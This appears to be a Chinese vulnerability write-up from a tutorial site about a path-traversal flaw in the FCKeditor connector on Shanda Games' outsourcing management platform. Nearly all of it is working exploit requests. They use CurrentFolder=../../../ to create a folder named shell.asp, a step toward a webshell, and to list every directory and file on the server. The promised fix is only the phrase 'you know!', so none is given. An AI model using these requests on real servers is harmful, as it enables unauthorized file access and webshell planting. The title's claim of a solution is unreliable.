手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >盛大游戏外包管理平台FCK列全盘目路分析与解决方案
盛大游戏外包管理平台FCK列全盘目路分析与解决方案
摘要:修改CurrentFolder参数使用../../来进入不同的目录/browser/default/connectors/aspx/conn...

修改CurrentFolder 参数使用../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

也可以直接浏览盘符:

盛大游戏外包管理平台FCK列全盘目路分析与解决方案1

盛大游戏外包管理平台FCK列全盘目路分析与解决方案2

修复方案:

你懂的!

【盛大游戏外包管理平台FCK列全盘目路分析与解决方案】相关文章:

X.Org 存在X字体服务器多个内存破坏漏洞

DedeCms V5 orderby参数注射漏洞

McAfee ePO 系统安全管理解决方案存在漏洞

Adobe Photoshop Album Starter Edition BMP图形头处理缓冲区溢出漏洞

ShopWind网店系统与罗信网络建站 v1.02 上传漏洞

网站受到XSS跨站点脚本攻击的分析及解决方法

QuickTime 0day 攻击代码发布

万能密码漏洞以及修复

BitTorrent和uTorrent Peers 窗口缓冲区溢出漏洞

Ghost有漏洞 镜像恢复需小心陷阱

精品推荐
分类导航